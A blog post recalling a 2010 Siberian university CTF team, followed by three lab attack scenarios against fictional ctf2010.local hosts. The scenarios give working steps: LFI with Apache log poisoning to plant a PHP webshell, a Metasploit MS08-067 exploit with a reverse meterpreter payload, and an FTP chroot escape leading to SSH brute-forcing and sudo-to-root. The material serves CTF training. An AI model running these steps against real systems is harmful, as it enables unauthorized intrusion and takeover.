š§ A Flashback to the Dawn of Competitive Hacking
The year is 2010. The world is recovering from the financial crisis, Appleās iPhone 4 is redefining mobile technology, and in the dimly lit computer labs of universities across the globe, a different revolution is brewingāthe rise of competitive cybersecurity capture-the-flag (CTF) competitions.
I was thereāa passionate student, fueled by endless cups of coffee, the thrill of the chase, and the dream of outsmarting a system. It was a time when hacking culture wasn't just about skill; it was about camaraderie, curiosity, and crafting solutions with limited resources but unlimited creativity.
Recently, I stumbled upon a treasure trove of memoriesāold code, challenge descriptions, and infrastructure setups from the CTF competitions I participated in with my team, Cr@zY Geek$. These weren't just games; they were battlegrounds where we honed our skills, learned from failures, and built the foundation of our careers in cybersecurity.
Today, Iām opening this time capsule and sharing it with the community. Whether you're a veteran who lived through these times or a newcomer curious about the roots of ethical hacking, thereās something here for you.
āļø The Attack & Defence Era: Where Real-Time Strategy Met Hackery
Most modern CTFs focus on jeopardy-style challenges (solving standalone puzzles), but our competitions often featured the intense Attack & Defence (A&D) format . This was the real dealāa high-stakes simulation of real-world cybersecurity warfare.
- Your Team's Mission: Protect your own vulnerable services (running on custom infrastructure) from being exploited by opposing teams while simultaneously attacking their systems to steal "flags" (specific pieces of data).
- The Infrastructure: Our setups, meticulously documented in Markdown files now hosted on GitHub, were built on a shoestring budget. Think old desktop computers repurposed as servers, networked together in a lab, often running on Linux distributions that were considered cutting-edge at the time. Managing these systems taught us more about practical network administration and security hardening than any textbook could.
- The Challenges: The vulnerabilities we planted and exploited were classics that are still relevant today: poorly sanitized inputs leading to SQL injection (SQLi) in web apps, buffer overflows in custom network services, misconfigured permissions, and cryptographic weaknesses . The key difference? We had to find and patch these flaws in our own services while everyone else was trying to exploit themāa brutal but incredibly effective learning process.
š ļø The Tools of the Trade: A Different Time
Our toolkit in 2010 was vastly different from the standardized platforms available today.
- Kali Linux predecessor, BackTrack, was the go-to penetration testing distribution for many .
- Web Vulnerability Scanners: Tools like Burp Suite were already indispensable for probing web applications, but their features were far less automated than they are now . Manual testing and a deep understanding of HTTP protocols were paramount.
- Reverse Engineering: For binary challenges, OllyDbg on Windows and GDB on Linux were our debuggers of choice. IDA Pro was the powerful (and expensive) disassembler we aspired to master .
- The Spirit of DIY: Perhaps the most significant difference was the lack of managed platforms. Much of the infrastructure for the competitionsāfrom the game master servers to the scoring enginesāwas built from scratch by the organizers and participating teams. This forced us to understand the entire stack, from low-level networking to application logic.
āļø About Cr@zY Geek$ CTF Team
The Cr@zY Geek$ team was formed in 2009 by enthusiasts and then-students of the Information Security Department of the Engineering and Technology Institute of the Siberian Academy of Law, Economics, and Management (SALEM) in Irtutsk city.
With the support of our programming team leader Oleg Usenko and Linux guru Yuri Nikolaevich Perelyaev.
CrazY geek$ became one of the first teams in the Siberian Federal District and the first CTF team in the city of Irkutsk to participate in competitions related to information security.
The competitions were held according to classic rules and included various tasks: reversing, crypto, recon, exploit, information gathering, solving cases for Linux, programming, etc.
Of course, the format at that time was completely different from what it is now. However, it was the first step in this direction... It was at that moment that the author of this blog became fascinated with reverse engineering and everything related to it.
At the university competitions held in 2010 among technical universities in Irkutsk, our team, Cr@zY Geek$, took first place in the qualifying round and second place in the final.
š¦ Whatās in the Archive? Sharing the Knowledge
Iāve uploaded a curated collection from those days to a GitHub repository. It includes:
- Challenge Descriptions: The original write-ups for various A&D tasks.
- Infrastructure Guides: Documentation on how we set up the vulnerable services and networking for our practices and competitions.
- Scripts & Tools: Custom scripts, patches, and configuration files used to deploy, secure, and attack services. These are historical artifacts that showcase the problem-solving approaches of the era.
- Tips & Tricks: Notes and shared knowledge from our team, offering a glimpse into our thought processes.
This isnāt just a code dump; itās a piece of hacking history. Itās for those who value the culture, the learning process, and the raw ingenuity that defined the early days of CTFs.
š¤ Why Share This Now?
- For the Nostalgia: For those who were there, letās take a moment to remember the late nights, the sudden breakthroughs, and the frustration of a service going down minutes before the end of a round.
- For the New Generation: To show that todayās polished CTF platforms and cloud infrastructure stand on the shoulders of these grassroots, DIY efforts. The core conceptsācritical thinking, persistence, and a deep understanding of systemsāhavenāt changed.
- For My Story: These competitions were a formative part of my journey into cybersecurity. They taught me strategic thinking, teamwork under pressure, and the ethics of responsible disclosureālessons that continue to shape my professional path, including my recent work with Grow Cluster.
I encourage you to explore the repo, not necessarily for the technical answers (some of the exploits are undoubtedly outdated!), but for the mindset and the methodology. Try to understand why things were built the way they were. You might be surprised at how many principles remain timeless.
š¬ Discussion Questions: What are your earliest memories of CTF or hacking culture? Whatās the most valuable lesson youāve learned from competitive security events? Share your stories below!
The Tasks
Host Descriptions:
- Router/GW:
gateway.ctf2010.local
- OS: Debian Linux 5.0 (Lenny) or CentOS 5.
- Role: NAT, basic iptables firewall.
- Web-Srv:
webserver.ctf2010.local
- OS: Ubuntu Server 10.04 LTS.
- Services: Apache 2.2 + PHP 5.3.x.
- Client:
client-pc.ctf2010.local
- OS: Windows XP SP3 / Windows 7.
- Details: Legacy browser (Firefox 3.6), outdated software.
- Internal-Server:
internal.ctf2010.local
- OS: CentOS 5.
- Services: vsftpd, ProFTPD, Samba, SSH on a non-standard port.
Scenario 1: Web Server Attack (LFI -> RCE)
Objective: Gain a remote shell on webserver.ctf2010.local
and retrieve the flag from /home/www-data/flag.txt
.
Infrastructure:
- Target:
webserver.ctf2010.local
(Linux) - Service: Apache 2.2.14 + PHP 5.3.2
- Web App: A simple PHP site with navigation like
index.php?page=news.html
.
Vulnerability:
- Local File Inclusion (LFI): The
index.php
script uses thepage
parameter without proper sanitization.- Vulnerable Code:
<?php include($_GET['page']); ?>
- Vulnerable Code:
- Insecure PHP Configuration:
register_globals = On
andallow_url_include = Off
(default).
Attack Steps:
- Reconnaissance: Port scanning (nmap) reveals open port 80 (HTTP).
- Vulnerability Discovery:
- Test:
http://webserver.ctf2010.local/index.php?page=../../../../etc/passwd
- Success is confirmed if the contents of
/etc/passwd
are displayed in the response.
- Test:
- Escalation to RCE (Remote Code Execution):
- Method 1: Apache Log Poisoning. Force the server to write PHP code into log files (e.g.,
access.log
) via the User-Agent header, then include the log file via LFI.-
curl -A "<?php system(\$_GET['cmd']); ?>" http://webserver.ctf2010.local/
-
http://webserver.ctf2010.local/index.php?page=../../../../var/log/apache2/access.log&cmd=id
-
- Method 2:
/proc/self/environ
Inclusion. If the User-Agent is stored in an environment variable and included via/proc/self/environ
, this can be exploited similarly.
- Method 1: Apache Log Poisoning. Force the server to write PHP code into log files (e.g.,
- Command Execution: Execute commands to find and read the flag:
&cmd=cat /home/www-data/flag.txt
.
Player's Challenge:
"Identify and exploit a critical vulnerability in the company's website to achieve remote code execution. Locate the confidential flag file on the server."
Scenario 2: Windows Client Attack (SMB + Buffer Overflow)
Objective: Gain full control of client-pc.ctf2010.local
and find the flag.txt
file on the user's Desktop.
Infrastructure:
- Target:
client-pc.ctf2010.local
(Windows XP SP3) - Services: SMB (Server Message Block - ports 139/445). Critical patches (like MS08-067) are not installed.
Vulnerability:
- MS08-067 (CVE-2008-4250): A critical remote code execution vulnerability in the Server Service. It allows an attacker to run arbitrary code without authentication.
Attack Steps:
- Reconnaissance: Network scanning identifies host
10.0.1.20
with port 445 (SMB) open. - Vulnerability Confirmation: Use a vulnerability scanner (e.g., a classic Nessus plugin or a standalone Nmap NSE script) to check for MS08-067.
- Exploitation:
- Launch Metasploit Framework (version 3.x).
-
use exploit/windows/smb/ms08_067_netapi
-
set RHOST 10.0.1.20
-
set PAYLOAD windows/meterpreter/reverse_tcp
-
exploit
- Gaining Access: A successful exploit will provide a
meterpreter
shell session on the compromised Windows host. - Flag Retrieval: Use meterpreter commands to search the filesystem:
search -f flag.txt
, or navigate manually:shell
->dir C:\Documents and Settings\USER\Desktop\flag.txt
.
Player's Challenge:
"An employee's workstation in the corporate network is missing critical security updates. Exploit a well-known operating system vulnerability to compromise the machine and retrieve a sensitive file."
Scenario 3: Internal Service Attack (FTP + Privilege Escalation)
A multi-stage attack focusing on service exploitation and misconfiguration.
Objective: Gain root access on internal.ctf2010.local
and read the final flag from /root/flag.txt
.
Infrastructure:
- Target:
internal.ctf2010.local
(Linux, CentOS 5) - Services: vsftpd 2.0.5 (vulnerable version), SSH on port 2222.
Vulnerabilities:
- CVE-2007-5966: A vulnerability in the chroot mechanism of vsftpd 2.0.5 that allows an authenticated user to escape the chroot jail and access the full filesystem.
- Privilege Escalation via Sudo: The local user
ftpadmin
has full sudo privileges without a password (NOPASSWD: ALL
in/etc/sudoers
).
Attack Steps:
- Reconnaissance: Scanning the target (
10.0.2.30
) reveals ports 21 (FTP) and 2222 (SSH). - FTP Attack:
- Connect:
ftp 10.0.2.30
- Login: Use anonymous access (or weak credentials like
admin:admin
). - Exploit vsftpd Chroot Escape: Use the
CWD
command to traverse outside the chroot:CWD .../.../.../.../.../.../.../.../.../.../
- This allows listing and downloading system files like
/etc/passwd
and/etc/sudoers
.
- Connect:
- Analysis & Privilege Escalation:
- Analyze the downloaded
/etc/sudoers
file. Discover the line:ftpadmin ALL=(ALL) NOPASSWD: ALL
. - This means the user
ftpadmin
can become root with the commandsudo su
.
- Analyze the downloaded
- SSH Access & Root:
- Brute-force or guess the password for the user
ftpadmin
over SSH on port 2222 (using a tool likehydra
or a simple wordlist). - Once logged in via SSH, escalate to root:
sudo su -
. -
cat /root/flag.txt
.
- Brute-force or guess the password for the user
Player's Challenge:
"Breach the internal file server by exploiting a vulnerability in its FTP service. Analyze the system's configuration to find a path to elevate your privileges to root and access the final flag."
Top comments (0)